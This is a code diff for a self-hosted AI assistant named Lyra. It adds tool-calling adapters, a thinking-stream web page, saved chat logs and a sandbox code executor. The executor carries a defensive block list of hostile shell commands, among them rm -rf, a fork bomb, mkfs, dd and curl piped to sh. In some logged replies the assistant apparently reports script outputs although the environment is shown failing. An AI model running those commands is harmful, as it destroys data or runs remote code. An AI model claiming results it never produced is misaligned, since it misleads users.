"content": "That sounds like a great idea! An orchestrator for your AI agent could involve scripting logic that coordinates different tasks based on user requests. Heres a simple example using Python:\n\n```python\ndef task_orchestrator(request):\n # Define the tasks\n tasks = {\n 'search': search_function,\n 'analyze_data': analyze_data_function,\n 'send_email': send_email_function,\n 'execute_script': execute_script_function\n }\n \n # Check if the request is valid\n if request in tasks:\n task = tasks[request]\n result = task()\n return result\n else:\n return \"Invalid request\"\n\ndef search_function():\n print(\"Searching...\")\n return \"Search completed.\"\n\ndef analyze_data_function():\n print(\"Analyzing data...\")\n return \"Data analysis complete.\"\n\ndef send_email_function():\n print(\"Sending email...\")\n return \"Email sent.\"\n\ndef execute_script_function():\n print(\"Executing script...\")\n return \"Script executed.\"\n\n# Example usage\nrequest = input(\"Enter a task (search, analyze_data, send_email, execute_script): \")\nresult = task_orchestrator(request)\nprint(result)\n```\n\nThis script defines an orchestrator function `task_orchestrator` that maps user requests to specific functions. You can expand this by adding more tasks and complexity as needed.\n\nDo you want to add more features or modify this example in any way?"
},
{
"role": "user",
"content": "can you write me a full program?"
},
{
"role": "assistant",
"content": "Certainly! Heres a more comprehensive Python script for an orchestrator that handles different tasks based on user input. This example includes functions for searching, analyzing data, sending emails, and executing scripts.\n\n```python\ndef search_function(query):\n print(f\"Searching for: {query}\")\n return f\"Search results for '{query}'\"\n\ndef analyze_data_function(data):\n print(\"Analyzing data...\")\n # Simulate some analysis\n result = \"Data analysis complete.\"\n return result\n\ndef send_email_function(to, subject, body):\n print(f\"Sending email to {to} with subject: {subject}\")\n return f\"Email sent to {to}\"\n\ndef execute_script_function(script_path):\n print(f\"Executing script at path: {script_path}\")\n # Simulate execution\n result = \"Script executed.\"\n return result\n\ndef task_orchestrator(request, *args, **kwargs):\n tasks = {\n 'search': search_function,\n 'analyze_data': analyze_data_function,\n 'send_email': send_email_function,\n 'execute_script': execute_script_function\n }\n \n if request in tasks:\n func = tasks[request]\n return func(*args, **kwargs)\n else:\n return \"Invalid request\"\n\n# Example usage\nif __name__ == \"__main__\":\n while True:\n request = input(\"Enter a task (search, analyze_data, send_email, execute_script) or 'exit' to quit: \")\n if request.lower() == 'exit':\n break\n \n # Determine the function and arguments based on the request\n if request == 'search':\n query = input(\"Enter search query: \")\n result = task_orchestrator(request, query)\n elif request == 'analyze_data':\n data = input(\"Enter data to analyze (or leave blank): \")\n result = task_orchestrator(request, data)\n elif request == 'send_email':\n to = input(\"Enter recipient email: \")\n subject = input(\"Enter email subject: \")\n body = input(\"Enter email body: \")\n result = task_orchestrator(request, to, subject, body)\n elif request == 'execute_script':\n script_path = input(\"Enter path to script: \")\n result = task_orchestrator(request, script_path)\n \n print(result)\n```\n\nThis program includes:\n- A `task_orchestrator` function that maps user requests to specific functions.\n- Example functions for searching, analyzing data, sending emails, and executing scripts.\n- Interactive input prompts to guide the user through different tasks.\n\nYou can run this script in your Python environment. It will prompt you to enter a task and then provide additional details as needed for each task.\n\nDo you have any specific requirements or modifications in mind?"
}
]

View File

@@ -0,0 +1,66 @@
[
{
"role": "user",
"content": "can you use python to calculate 50/2?"
},
{
"role": "assistant",
"content": "The result of 50 divided by 2 is 25.0."
},
{
"role": "user",
"content": "can you generate random numbers with python? please run the script for me"
},
{
"role": "assistant",
"content": "Here are five random numbers between 1 and 100: `[84, 82, 73, 37, 22]`."
},
{
"role": "user",
"content": "can you build a python script that does something cool? whatever you want. And run it so i can see it"
},
{
"role": "assistant",
"content": "Here is the randomly generated password:\n\n```\nUc6hsO!v)kh:\n```\n\nYou can use this password for your needs. If you need another one, just let me know!"
},
{
"role": "user",
"content": "hey im testing things"
},
{
"role": "assistant",
"content": "Hello! How can I assist you with your tests? Do you have a specific task or question in mind?"
},
{
"role": "user",
"content": "hmm for some reason your thinking stream insnt connecting. its odd"
},
{
"role": "assistant",
"content": "Great! The code executed successfully and printed \"Hello, World!\". This suggests that the connection is working correctly.\n\nIs there anything specific you'd like to test or try next?"
},
{
"role": "user",
"content": "make some more cool scripts"
},
{
"role": "assistant",
"content": "Great! The scripts are working correctly now.\n\n1. The first script generated a random number between 1 and 100, which was `91`.\n2. The second script plotted this number on a histogram.\n\nHere is the output from the first script:\n```\n91\n```\n\nAnd here is what should have been displayed in the plot (though I can't show the image directly):\n- A histogram with one bar at position 91, indicating that the random number generated was 91.\n\nWould you like to run these scripts again or try something else?"
},
{
"role": "user",
"content": "can you make a script that displays a ball bouncing around?"
},
{
"role": "assistant",
"content": "It seems there is a persistent issue with the execution environment. Let's simplify the approach and try running the script directly in this context.\n\nHere is the Python code for a bouncing ball animation:\n\n```python\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# Create a figure and axis\nfig, ax = plt.subplots()\n\n# Set the limits for the axes so that the ball doesn't go out of bounds\nax.set_xlim(0, 8)\nax.set_ylim(0, 6)\n\n# Initial position of the ball\nball, = ax.plot([2], [3], 'ro') # 'ro' means a red circle\n\ndef init():\n ball.set_data([], [])\n return ball,\n\ndef animate(i):\n x = i % 8\n y = (i // 8) % 6\n ball.set_data(x, y)\n return ball,\n\n# Create the animation\nani = animation.FuncAnimation(fig, animate, init_func=init,\n frames=48, interval=50, blit=True)\n\nplt.show()\n```\n\nSince we are unable to execute it directly, let's describe the steps you can follow in your local environment:\n\n1. Install `matplotlib` if you haven't already:\n ```bash\n pip install matplotlib\n ```\n2. Copy and paste the above code into a Python script (e.g., `bouncing_ball.py`) and run it.\n\nThis should display an animation of a ball bouncing around within a 8x6 window in your local environment. If you need further assistance or have any other requests, feel free to ask!"
},
{
"role": "user",
"content": "im trying to fix your python environment. Can you make a script that just says hello world 5 times?"
},
{
"role": "assistant",
"content": "The script executed successfully and printed \"Hello, World!\" five times as expected:\n\n```\nHello, World!\nHello, World!\nHello, World!\nHello, World!\nHello, World!\n```\n\nIf you need any more scripts or assistance with anything else, feel free to let me know!"
}
]

View File

@@ -0,0 +1 @@
{}

View File

@@ -0,0 +1,58 @@
[
{
"role": "user",
"content": "hello how are you? do you have any fun special abilities?"
},
{
"role": "assistant",
"content": "Hello! I'm here to help you with information and tasks. While I don't have physical abilities, I can execute code, search the web for answers, and assist with various queries. How can I help you today?"
},
{
"role": "user",
"content": "can you look up the weather for pittsburgh tonight?"
},
{
"role": "assistant",
"content": "It seems there was an issue with connecting to the weather API due to a temporary network or DNS resolution problem. Let's try using a web search instead to find the current weather in Pittsburgh.\n\nI'll look up the weather for Pittsburgh tonight using DuckDuckGo."
},
{
"role": "user",
"content": "can you make a small program that generates random numbers?"
},
{
"role": "assistant",
"content": "Let's try that again using Python:\n\n```python\nimport random\n\ndef generate_random_numbers(count, min_val, max_val):\n return [random.randint(min_val, max_val) for _ in range(count)]\n\n# Example usage: Generate 10 random numbers between 1 and 100\nrandom_numbers = generate_random_numbers(10, 1, 100)\nprint(random_numbers)\n```\n\nI'll execute this Python code to generate 10 random numbers between 1 and 100.\n<tool_call>\n <name>execute_code</name>\n <arguments>\n <language>python</language>\n <code>import random\n\ndef generate_random_numbers(count, min_val, max_val):\n return [random.randint(min_val, max_val) for _ in range(count)]\n\n# Example usage: Generate 10 random numbers between 1 and 100\nrandom_numbers = generate_random_numbers(10, 1, 100)\nprint(random_numbers)</code>\n <reason>To generate a list of 10 random numbers between 1 and 100</reason>\n</arguments>"
},
{
"role": "user",
"content": "Try again please!"
},
{
"role": "assistant",
"content": "Could you please provide more details on what you'd like me to do or try? I'll need some context to assist you effectively."
},
{
"role": "user",
"content": "oh sorry, can you generate a random number between 1 and 1000"
},
{
"role": "assistant",
"content": "Here is a random number between 1 and 1000:\n\n```\n457\n```\n\nSo, the generated random number is **457**."
},
{
"role": "user",
"content": "how did you do that?"
},
{
"role": "assistant",
"content": "I used Python to generate a random number between 1 and 1000. Heres how I did it:\n\n```python\nimport random\n\nrandom_number = random.randint(1, 1000)\nrandom_number\n```\n\nThe `random.randint(1, 1000)` function generates a random integer between 1 and 1000 (inclusive).\n\nWould you like to see the code executed again?"
},
{
"role": "user",
"content": "thats cool that you can run code"
},
{
"role": "assistant",
"content": "Great! If you have any specific tasks or calculations you need help with, feel free to ask! Whether it's mathematical operations, data processing, or anything else, I'm here to assist you. Do you have a particular request in mind?"
}
]

View File

@@ -0,0 +1 @@
{}

View File

@@ -33,6 +33,7 @@
<select id="sessions"></select>
<button id="newSessionBtn"> New</button>
<button id="renameSessionBtn">✏️ Rename</button>
<button id="thinkingStreamBtn" title="Show thinking stream in new window">🧠 Show Work</button>
</div>
<!-- Status -->
@@ -359,7 +360,20 @@
addMessage("system", `Session renamed to: ${newName}`);
});
// Thinking Stream button
document.getElementById("thinkingStreamBtn").addEventListener("click", () => {
if (!currentSession) {
alert("Please select a session first");
return;
}
// Open thinking stream in new window
const streamUrl = `http://10.0.0.41:8081/thinking-stream.html?session=${currentSession}`;
const windowFeatures = "width=600,height=800,menubar=no,toolbar=no,location=no,status=no";
window.open(streamUrl, `thinking_${currentSession}`, windowFeatures);
addMessage("system", "🧠 Opened thinking stream in new window");
});
// Settings Modal

View File

@@ -81,6 +81,16 @@ button:hover, select:hover {
cursor: pointer;
}
#thinkingStreamBtn {
background: rgba(138, 43, 226, 0.2);
border-color: #8a2be2;
}
#thinkingStreamBtn:hover {
box-shadow: 0 0 8px #8a2be2;
background: rgba(138, 43, 226, 0.3);
}
/* Chat area */
#messages {
flex: 1;

View File

@@ -0,0 +1,362 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>🧠 Thinking Stream</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #0d0d0d;
color: #e0e0e0;
height: 100vh;
display: flex;
flex-direction: column;
overflow: hidden;
}
.header {
background: #1a1a1a;
padding: 15px 20px;
border-bottom: 2px solid #333;
display: flex;
align-items: center;
justify-content: space-between;
}
.header h1 {
font-size: 18px;
font-weight: bold;
}
.status {
display: flex;
align-items: center;
gap: 10px;
font-size: 14px;
}
.status-dot {
width: 10px;
height: 10px;
border-radius: 50%;
background: #666;
}
.status-dot.connected {
background: #90ee90;
box-shadow: 0 0 10px #90ee90;
}
.status-dot.disconnected {
background: #ff6b6b;
}
.events-container {
flex: 1;
overflow-y: auto;
padding: 20px;
}
.event {
margin-bottom: 12px;
padding: 10px 15px;
border-radius: 6px;
font-size: 14px;
font-family: 'Courier New', monospace;
animation: slideIn 0.3s ease-out;
border-left: 3px solid;
}
@keyframes slideIn {
from {
opacity: 0;
transform: translateX(-20px);
}
to {
opacity: 1;
transform: translateX(0);
}
}
.event-connected {
background: #1a2a1a;
border-color: #4a7c59;
color: #90ee90;
}
.event-thinking {
background: #1a3a1a;
border-color: #5a9c69;
color: #a0f0a0;
}
.event-tool_call {
background: #3a2a1a;
border-color: #d97706;
color: #fbbf24;
}
.event-tool_result {
background: #1a2a3a;
border-color: #0ea5e9;
color: #7dd3fc;
}
.event-done {
background: #2a1a3a;
border-color: #a855f7;
color: #e9d5ff;
font-weight: bold;
}
.event-error {
background: #3a1a1a;
border-color: #dc2626;
color: #fca5a5;
}
.event-icon {
display: inline-block;
margin-right: 8px;
}
.event-details {
font-size: 12px;
color: #999;
margin-top: 5px;
padding-left: 25px;
}
.footer {
background: #1a1a1a;
padding: 10px 20px;
border-top: 1px solid #333;
text-align: center;
font-size: 12px;
color: #666;
}
.clear-btn {
background: #333;
border: 1px solid #444;
color: #e0e0e0;
padding: 6px 12px;
border-radius: 4px;
cursor: pointer;
font-size: 12px;
}
.clear-btn:hover {
background: #444;
}
.empty-state {
text-align: center;
padding: 60px 20px;
color: #666;
}
.empty-state-icon {
font-size: 48px;
margin-bottom: 20px;
}
</style>
</head>
<body>
<div class="header">
<h1>🧠 Thinking Stream</h1>
<div class="status">
<div class="status-dot" id="statusDot"></div>
<span id="statusText">Connecting...</span>
</div>
</div>
<div class="events-container" id="events">
<div class="empty-state">
<div class="empty-state-icon">🤔</div>
<p>Waiting for thinking events...</p>
<p style="font-size: 12px; margin-top: 10px;">Events will appear here when Lyra uses tools</p>
</div>
</div>
<div class="footer">
<button class="clear-btn" onclick="clearEvents()">Clear Events</button>
<span style="margin: 0 20px;">|</span>
<span id="sessionInfo">Session: <span id="sessionId">-</span></span>
</div>
<script>
console.log('🧠 Thinking stream page loaded!');
// Get session ID from URL
const urlParams = new URLSearchParams(window.location.search);
const SESSION_ID = urlParams.get('session');
const CORTEX_BASE = "http://10.0.0.41:7081"; // Direct to cortex
console.log('Session ID:', SESSION_ID);
console.log('Cortex base:', CORTEX_BASE);
// Declare variables first
let eventSource = null;
let eventCount = 0;
if (!SESSION_ID) {
document.getElementById('events').innerHTML = `
<div class="empty-state">
<div class="empty-state-icon">⚠️</div>
<p>No session ID provided</p>
<p style="font-size: 12px; margin-top: 10px;">Please open this from the main chat interface</p>
</div>
`;
} else {
document.getElementById('sessionId').textContent = SESSION_ID;
connectStream();
}
function connectStream() {
if (eventSource) {
eventSource.close();
}
const url = `${CORTEX_BASE}/stream/thinking/${SESSION_ID}`;
console.log('Connecting to:', url);
eventSource = new EventSource(url);
eventSource.onopen = () => {
console.log('EventSource onopen fired');
updateStatus(true, 'Connected');
};
eventSource.onmessage = (event) => {
console.log('Received message:', event.data);
try {
const data = JSON.parse(event.data);
// Update status to connected when first message arrives
if (data.type === 'connected') {
updateStatus(true, 'Connected');
}
addEvent(data);
} catch (e) {
console.error('Failed to parse event:', e, event.data);
}
};
eventSource.onerror = (error) => {
console.error('Stream error:', error, 'readyState:', eventSource.readyState);
updateStatus(false, 'Disconnected');
// Try to reconnect after 2 seconds
setTimeout(() => {
if (eventSource.readyState === EventSource.CLOSED) {
console.log('Attempting to reconnect...');
connectStream();
}
}, 2000);
};
}
function updateStatus(connected, text) {
const dot = document.getElementById('statusDot');
const statusText = document.getElementById('statusText');
dot.className = 'status-dot ' + (connected ? 'connected' : 'disconnected');
statusText.textContent = text;
}
function addEvent(event) {
const container = document.getElementById('events');
// Remove empty state if present
if (eventCount === 0) {
container.innerHTML = '';
}
const eventDiv = document.createElement('div');
eventDiv.className = `event event-${event.type}`;
let icon = '';
let message = '';
let details = '';
switch (event.type) {
case 'connected':
icon = '✓';
message = 'Stream connected';
details = `Session: ${event.session_id}`;
break;
case 'thinking':
icon = '🤔';
message = event.data.message;
break;
case 'tool_call':
icon = '🔧';
message = event.data.message;
details = JSON.stringify(event.data.args, null, 2);
break;
case 'tool_result':
icon = '📊';
message = event.data.message;
if (event.data.result && event.data.result.stdout) {
details = `stdout: ${event.data.result.stdout}`;
}
break;
case 'done':
icon = '✅';
message = event.data.message;
details = event.data.final_answer;
break;
case 'error':
icon = '❌';
message = event.data.message;
break;
default:
icon = '•';
message = JSON.stringify(event.data);
}
eventDiv.innerHTML = `
<span class="event-icon">${icon}</span>
<span>${message}</span>
${details ? `<div class="event-details">${details}</div>` : ''}
`;
container.appendChild(eventDiv);
container.scrollTop = container.scrollHeight;
eventCount++;
}
function clearEvents() {
const container = document.getElementById('events');
container.innerHTML = `
<div class="empty-state">
<div class="empty-state-icon">🤔</div>
<p>Waiting for thinking events...</p>
<p style="font-size: 12px; margin-top: 10px;">Events will appear here when Lyra uses tools</p>
</div>
`;
eventCount = 0;
}
// Cleanup on page unload
window.addEventListener('beforeunload', () => {
if (eventSource) {
eventSource.close();
}
});
</script>
</body>
</html>
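The page above consumes Server-Sent Events via `EventSource`, which requires each message on the wire to be framed as one or more `data:` lines terminated by a blank line. A minimal sketch of the server-side framing the client expects (the helper name `sse_format` and the event shape are illustrative assumptions, not the actual `stream_events.py` implementation):

```python
import json

def sse_format(event_type: str, data: dict) -> str:
    """Frame one event as an SSE 'data:' block the EventSource client can parse."""
    payload = {"type": event_type, "data": data}
    # SSE framing: a "data:" line followed by a blank line ends the message.
    return f"data: {json.dumps(payload)}\n\n"

# An event shaped like the page's 'tool_call' branch expects
message = sse_format("tool_call", {"message": "Running execute_code", "args": {"language": "python"}})
print(message, end="")
```

Whatever yields these strings on the server side (e.g. a streaming HTTP response) just needs to emit one `sse_format(...)` result per event; the page's `onmessage` handler then `JSON.parse`s the `data` payload.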

View File

@@ -1,5 +1,11 @@
FROM python:3.11-slim
WORKDIR /app
# Install docker CLI for code executor
RUN apt-get update && apt-get install -y \
docker.io \
&& rm -rf /var/lib/apt/lists/*
COPY requirements.txt .
RUN pip install -r requirements.txt
COPY . .

View File

@@ -0,0 +1,13 @@
"""Provider adapters for tool calling."""
from .base import ToolAdapter
from .openai_adapter import OpenAIAdapter
from .ollama_adapter import OllamaAdapter
from .llamacpp_adapter import LlamaCppAdapter
__all__ = [
"ToolAdapter",
"OpenAIAdapter",
"OllamaAdapter",
"LlamaCppAdapter",
]

View File

@@ -0,0 +1,79 @@
"""
Base adapter interface for provider-agnostic tool calling.
This module defines the abstract base class that all LLM provider adapters
must implement to support tool calling in Lyra.
"""
from abc import ABC, abstractmethod
from typing import Dict, List, Optional
class ToolAdapter(ABC):
"""Base class for provider-specific tool adapters.
Each LLM provider (OpenAI, Ollama, llama.cpp, etc.) has its own
way of handling tool calls. This adapter pattern allows Lyra to
support tools across all providers with a unified interface.
"""
@abstractmethod
async def prepare_request(
self,
messages: List[Dict],
tools: List[Dict],
tool_choice: Optional[str] = None
) -> Dict:
"""Convert Lyra tool definitions to provider-specific format.
Args:
messages: Conversation history in OpenAI format
tools: List of Lyra tool definitions (provider-agnostic)
tool_choice: Optional tool forcing ("auto", "required", "none")
Returns:
dict: Provider-specific request payload ready to send to LLM
"""
pass
@abstractmethod
async def parse_response(self, response) -> Dict:
"""Extract tool calls from provider response.
Args:
response: Raw provider response (format varies by provider)
Returns:
dict: Standardized response in Lyra format:
{
"content": str, # Assistant's text response
"tool_calls": [ # List of tool calls or None
{
"id": str, # Unique call ID
"name": str, # Tool name
"arguments": dict # Tool arguments
}
] or None
}
"""
pass
@abstractmethod
def format_tool_result(
self,
tool_call_id: str,
tool_name: str,
result: Dict
) -> Dict:
"""Format tool execution result for next LLM call.
Args:
tool_call_id: ID from the original tool call
tool_name: Name of the executed tool
result: Tool execution result dictionary
Returns:
dict: Message object to append to conversation
(format varies by provider)
"""
pass

View File

@@ -0,0 +1,17 @@
"""
llama.cpp adapter for tool calling.
Since llama.cpp has similar constraints to Ollama (no native function calling),
this adapter reuses the XML-based approach from OllamaAdapter.
"""
from .ollama_adapter import OllamaAdapter
class LlamaCppAdapter(OllamaAdapter):
"""llama.cpp adapter - uses same XML approach as Ollama.
llama.cpp doesn't have native function calling support, so we use
the same XML-based prompt engineering approach as Ollama.
"""
pass

View File

@@ -0,0 +1,191 @@
"""
Ollama adapter for tool calling using XML-structured prompts.
Since Ollama doesn't have native function calling, this adapter uses
XML-based prompts to instruct the model how to call tools.
"""
import json
import re
from typing import Dict, List, Optional
from .base import ToolAdapter
class OllamaAdapter(ToolAdapter):
"""Ollama adapter using XML-structured prompts for tool calling.
This adapter injects tool descriptions into the system prompt and
teaches the model to respond with XML when it wants to use a tool.
"""
SYSTEM_PROMPT = """You have access to the following tools:
{tool_descriptions}
To use a tool, respond with XML in this exact format:
<tool_call>
<name>tool_name</name>
<arguments>
<arg_name>value</arg_name>
</arguments>
<reason>why you're using this tool</reason>
</tool_call>
You can call multiple tools by including multiple <tool_call> blocks.
If you don't need to use any tools, respond normally without XML.
After tools are executed, you'll receive results and can continue the conversation."""
async def prepare_request(
self,
messages: List[Dict],
tools: List[Dict],
tool_choice: Optional[str] = None
) -> Dict:
"""Inject tool descriptions into system prompt.
Args:
messages: Conversation history
tools: Lyra tool definitions
tool_choice: Ignored for Ollama (no native support)
Returns:
dict: Request payload with modified messages
"""
# Format tool descriptions
tool_desc = "\n".join([
f"- {t['name']}: {t['description']}\n Parameters: {self._format_parameters(t['parameters'], t.get('required', []))}"
for t in tools
])
system_msg = self.SYSTEM_PROMPT.format(tool_descriptions=tool_desc)
# Check if first message is already a system message
modified_messages = messages.copy()
if modified_messages and modified_messages[0].get("role") == "system":
# Prepend tool instructions to existing system message
modified_messages[0]["content"] = system_msg + "\n\n" + modified_messages[0]["content"]
else:
# Add new system message at the beginning
modified_messages.insert(0, {"role": "system", "content": system_msg})
return {"messages": modified_messages}
def _format_parameters(self, parameters: Dict, required: List[str]) -> str:
"""Format parameters for tool description.
Args:
parameters: Parameter definitions
required: List of required parameter names
Returns:
str: Human-readable parameter description
"""
param_strs = []
for name, spec in parameters.items():
req_marker = "(required)" if name in required else "(optional)"
param_strs.append(f"{name} {req_marker}: {spec.get('description', '')}")
return ", ".join(param_strs)
async def parse_response(self, response) -> Dict:
"""Extract tool calls from XML in response.
Args:
response: String response from Ollama
Returns:
dict: Standardized Lyra format with content and tool_calls
"""
import logging
logger = logging.getLogger(__name__)
# Ollama returns a string
if isinstance(response, dict):
content = response.get("message", {}).get("content", "")
else:
content = str(response)
logger.info(f"🔍 OllamaAdapter.parse_response: content length={len(content)}, has <tool_call>={('<tool_call>' in content)}")
logger.debug(f"🔍 Content preview: {content[:500]}")
# Parse XML tool calls
tool_calls = []
if "<tool_call>" in content:
# Split content by <tool_call> to get each block
blocks = content.split('<tool_call>')
logger.info(f"🔍 Split into {len(blocks)} blocks")
# First block is content before any tool calls
clean_parts = [blocks[0]]
for idx, block in enumerate(blocks[1:]): # Skip first block (pre-tool content)
# Extract tool name
name_match = re.search(r'<name>(.*?)</name>', block)
if not name_match:
logger.warning(f"Block {idx} has no <name> tag, skipping")
continue
name = name_match.group(1).strip()
arguments = {}
# Extract arguments
args_match = re.search(r'<arguments>(.*?)</arguments>', block, re.DOTALL)
if args_match:
args_xml = args_match.group(1)
# Parse <key>value</key> pairs
arg_pairs = re.findall(r'<(\w+)>(.*?)</\1>', args_xml, re.DOTALL)
arguments = {k: v.strip() for k, v in arg_pairs}
tool_calls.append({
"id": f"call_{idx}",
"name": name,
"arguments": arguments
})
# For clean content, find what comes AFTER the tool call block
# Look for the last closing tag (</tool_call> or malformed </xxx>) and keep what's after
# Split by any closing tag at the END of the tool block
remaining = block
# Remove everything up to and including a standalone closing tag
# Pattern: find </something> that's not followed by more XML
end_match = re.search(r'</[a-z_]+>\s*(.*)$', remaining, re.DOTALL)
if end_match:
after_content = end_match.group(1).strip()
if after_content and not after_content.startswith('<'):
# Only keep if it's actual text content, not more XML
clean_parts.append(after_content)
clean_content = ''.join(clean_parts).strip()
else:
clean_content = content
return {
"content": clean_content,
"tool_calls": tool_calls if tool_calls else None
}
def format_tool_result(
self,
tool_call_id: str,
tool_name: str,
result: Dict
) -> Dict:
"""Format tool result as XML for next prompt.
Args:
tool_call_id: ID from the original tool call
tool_name: Name of the executed tool
result: Tool execution result
Returns:
dict: Message in user role with XML-formatted result
"""
# Format result as XML
result_xml = f"""<tool_result>
<tool>{tool_name}</tool>
<result>{json.dumps(result, ensure_ascii=False)}</result>
</tool_result>"""
return {
"role": "user",
"content": result_xml
}
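The regex pipeline in `parse_response` can be exercised in isolation. This standalone sketch reimplements just the extraction step (splitting on `<tool_call>`, then applying the same `<name>`, `<arguments>`, and backreferenced `<key>value</key>` patterns) against a sample completion:

```python
import re

SAMPLE = """Let me check that for you.
<tool_call>
 <name>execute_code</name>
 <arguments>
  <language>python</language>
  <code>print(50 / 2)</code>
 </arguments>
 <reason>compute 50/2</reason>
</tool_call>"""

def extract_tool_calls(content: str):
    calls = []
    # First split element is pre-tool text; each later element is one call block
    for idx, block in enumerate(content.split("<tool_call>")[1:]):
        name_match = re.search(r"<name>(.*?)</name>", block)
        if not name_match:
            continue  # malformed block: no <name> tag
        arguments = {}
        args_match = re.search(r"<arguments>(.*?)</arguments>", block, re.DOTALL)
        if args_match:
            # The \1 backreference requires matching open/close tag names
            pairs = re.findall(r"<(\w+)>(.*?)</\1>", args_match.group(1), re.DOTALL)
            arguments = {k: v.strip() for k, v in pairs}
        calls.append({"id": f"call_{idx}", "name": name_match.group(1).strip(), "arguments": arguments})
    return calls

print(extract_tool_calls(SAMPLE))
```

Note that the non-greedy `(.*?)` with `re.DOTALL` keeps multi-line `<code>` arguments intact, which is why the adapter can round-trip whole scripts through a single XML argument.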

View File

@@ -0,0 +1,130 @@
"""
OpenAI adapter for tool calling using native function calling API.
This adapter converts Lyra tool definitions to OpenAI's function calling
format and parses OpenAI responses back to Lyra's standardized format.
"""
import json
from typing import Dict, List, Optional
from .base import ToolAdapter
class OpenAIAdapter(ToolAdapter):
"""OpenAI-specific adapter using native function calling.
OpenAI supports function calling natively through the 'tools' parameter
in chat completions. This adapter leverages that capability.
"""
async def prepare_request(
self,
messages: List[Dict],
tools: List[Dict],
tool_choice: Optional[str] = None
) -> Dict:
"""Convert Lyra tools to OpenAI function calling format.
Args:
messages: Conversation history
tools: Lyra tool definitions
tool_choice: "auto", "required", "none", or None
Returns:
dict: Request payload with OpenAI-formatted tools
"""
# Convert Lyra tools → OpenAI function calling format
openai_tools = []
for tool in tools:
openai_tools.append({
"type": "function",
"function": {
"name": tool["name"],
"description": tool["description"],
"parameters": {
"type": "object",
"properties": tool["parameters"],
"required": tool.get("required", [])
}
}
})
payload = {
"messages": messages,
"tools": openai_tools
}
# Add tool_choice if specified
if tool_choice:
if tool_choice == "required":
payload["tool_choice"] = "required"
elif tool_choice == "none":
payload["tool_choice"] = "none"
else: # "auto" or default
payload["tool_choice"] = "auto"
return payload
async def parse_response(self, response) -> Dict:
"""Extract tool calls from OpenAI response.
Args:
response: OpenAI ChatCompletion response object
Returns:
dict: Standardized Lyra format with content and tool_calls
"""
message = response.choices[0].message
content = message.content if message.content else ""
tool_calls = []
# Check if response contains tool calls
if hasattr(message, 'tool_calls') and message.tool_calls:
for tc in message.tool_calls:
try:
# Parse arguments (may be JSON string)
args = tc.function.arguments
if isinstance(args, str):
args = json.loads(args)
tool_calls.append({
"id": tc.id,
"name": tc.function.name,
"arguments": args
})
except json.JSONDecodeError as e:
# If arguments can't be parsed, include error
tool_calls.append({
"id": tc.id,
"name": tc.function.name,
"arguments": {},
"error": f"Failed to parse arguments: {str(e)}"
})
return {
"content": content,
"tool_calls": tool_calls if tool_calls else None
}
def format_tool_result(
self,
tool_call_id: str,
tool_name: str,
result: Dict
) -> Dict:
"""Format tool result as OpenAI tool message.
Args:
tool_call_id: ID from the original tool call
tool_name: Name of the executed tool
result: Tool execution result
Returns:
dict: Message in OpenAI tool message format
"""
return {
"role": "tool",
"tool_call_id": tool_call_id,
"name": tool_name,
"content": json.dumps(result, ensure_ascii=False)
}
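The Lyra→OpenAI conversion in `prepare_request` is a pure dict transformation, so it can be checked with a toy tool definition (the `web_search` definition below is illustrative, not the registry's actual entry):

```python
def to_openai_tool(tool: dict) -> dict:
    """Wrap a provider-agnostic tool definition in OpenAI's function-calling schema."""
    return {
        "type": "function",
        "function": {
            "name": tool["name"],
            "description": tool["description"],
            "parameters": {
                "type": "object",
                "properties": tool["parameters"],
                "required": tool.get("required", []),
            },
        },
    }

# Hypothetical Lyra-style definition for illustration
lyra_tool = {
    "name": "web_search",
    "description": "Search the web with DuckDuckGo",
    "parameters": {"query": {"type": "string", "description": "Search terms"}},
    "required": ["query"],
}
print(to_openai_tool(lyra_tool))
```

Because the shape is a deterministic wrapper, a unit test can compare the converted dict directly, without calling any LLM.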

View File

@@ -0,0 +1,12 @@
"""Tool executors for Lyra."""
from .code_executor import execute_code
from .web_search import search_web
from .trillium import search_notes, create_note
__all__ = [
"execute_code",
"search_web",
"search_notes",
"create_note",
]

View File

@@ -0,0 +1,162 @@
"""
Code executor for running Python and bash code in a sandbox container.
This module provides secure code execution with timeout protection,
output limits, and forbidden pattern detection.
"""
import asyncio
import os
import tempfile
import re
from typing import Dict
# Forbidden patterns that pose security risks
FORBIDDEN_PATTERNS = [
r'rm\s+-rf', # Destructive file removal
r':\(\)\{\s*:\|:&\s*\};:', # Fork bomb
r'mkfs', # Filesystem formatting
r'/dev/sd[a-z]', # Direct device access
r'dd\s+if=', # Low-level disk operations
r'>\s*/dev/sd', # Writing to devices
r'curl.*\|.*sh', # Pipe to shell (common attack vector)
r'wget.*\|.*sh', # Pipe to shell
]
async def execute_code(args: Dict) -> Dict:
"""Execute code in sandbox container.
Args:
args: Dictionary containing:
- language (str): "python" or "bash"
- code (str): The code to execute
- reason (str): Why this code is being executed
- timeout (int, optional): Execution timeout in seconds
Returns:
dict: Execution result containing:
- stdout (str): Standard output
- stderr (str): Standard error
- exit_code (int): Process exit code
- execution_time (float): Time taken in seconds
OR
- error (str): Error message if execution failed
"""
language = args.get("language")
code = args.get("code")
reason = args.get("reason", "No reason provided")
timeout = args.get("timeout", 30)
# Validation
if not language or language not in ["python", "bash"]:
return {"error": "Invalid language. Must be 'python' or 'bash'"}
if not code:
return {"error": "No code provided"}
# Security: Check for forbidden patterns
for pattern in FORBIDDEN_PATTERNS:
if re.search(pattern, code, re.IGNORECASE):
return {"error": "Forbidden pattern detected for security reasons"}
# Validate and cap timeout
max_timeout = int(os.getenv("CODE_SANDBOX_MAX_TIMEOUT", "120"))
timeout = min(max(timeout, 1), max_timeout)
container = os.getenv("CODE_SANDBOX_CONTAINER", "lyra-code-sandbox")
# Write code to temporary file
suffix = ".py" if language == "python" else ".sh"
try:
with tempfile.NamedTemporaryFile(
mode='w',
suffix=suffix,
delete=False,
encoding='utf-8'
) as f:
f.write(code)
temp_file = f.name
except Exception as e:
return {"error": f"Failed to create temp file: {str(e)}"}
try:
# Copy file to container
exec_path = f"/executions/{os.path.basename(temp_file)}"
cp_proc = await asyncio.create_subprocess_exec(
"docker", "cp", temp_file, f"{container}:{exec_path}",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
await cp_proc.communicate()
if cp_proc.returncode != 0:
return {"error": "Failed to copy code to sandbox container"}
